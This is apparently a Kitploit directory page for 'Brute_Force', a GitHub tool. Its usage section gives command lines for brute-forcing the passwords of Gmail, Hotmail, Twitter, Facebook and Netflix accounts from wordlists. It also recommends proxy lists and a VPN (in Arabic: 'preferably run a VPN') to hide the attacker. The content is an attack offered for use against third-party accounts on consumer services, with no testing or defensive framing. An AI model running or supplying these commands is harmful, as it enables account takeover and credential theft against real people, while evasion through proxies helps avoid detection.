Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Brute_Force — Brute_Force_Attack Gmail Hotmail Twitter Facebook Netflix | Kitploit
Tools/GitHubGitHub/matrix07ksa/brute_force
Password CrackingPassword AttacksWeb SecuritySocial Engineering
GitHubmatrix07ksa/brute_force

Brute_Force

Brute_Force_Attack Gmail Hotmail Twitter Facebook Netflix

View Repository
1.8k273116 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Brute_Force

Python 3.7 GPL Termux platform Twitter alt text alt text

install :

root@kitploit:~
sudo apt install python3 python3-pip

pip3 install proxylist

pip3 install mechanize

Usage:

BruteForce Gmail Attack

root@kitploit:~
python3 Brute_Force.py -g [email protected] -l File_list

python3 Brute_Force.py -g [email protected] -p Password_Single

BruteForce Hotmail Attack

root@kitploit:~
python3 Brute_Force.py -t [email protected] -l File_list

python3 Brute_Force.py -t [email protected] -p Password_Single

BruteForce Twitter Attack

root@kitploit:~
python3 Brute_Force.py -T Account_Twitter -l File_list
python3 Brute_Force.py -T Account_Twitter -l File_list -X proxy-list.txt

BruteForce Facebook Attack

root@kitploit:~
python3 Brute_Force.py -f Account_facebook -l File_list
python3 Brute_Force.py -f Account_facebook -l File_list -X proxy-list.txt

BruteForce Netflix Attack

root@kitploit:~
يفضل تشغيل VPN
Start On Vpn
python3 Brute_Force.py -n Account_Netflix -l File_list
python3 Brute_Force.py -n Account_Netflix -l File_list -X proxy-list.txt


وترقبووو المزيد 
Download Tool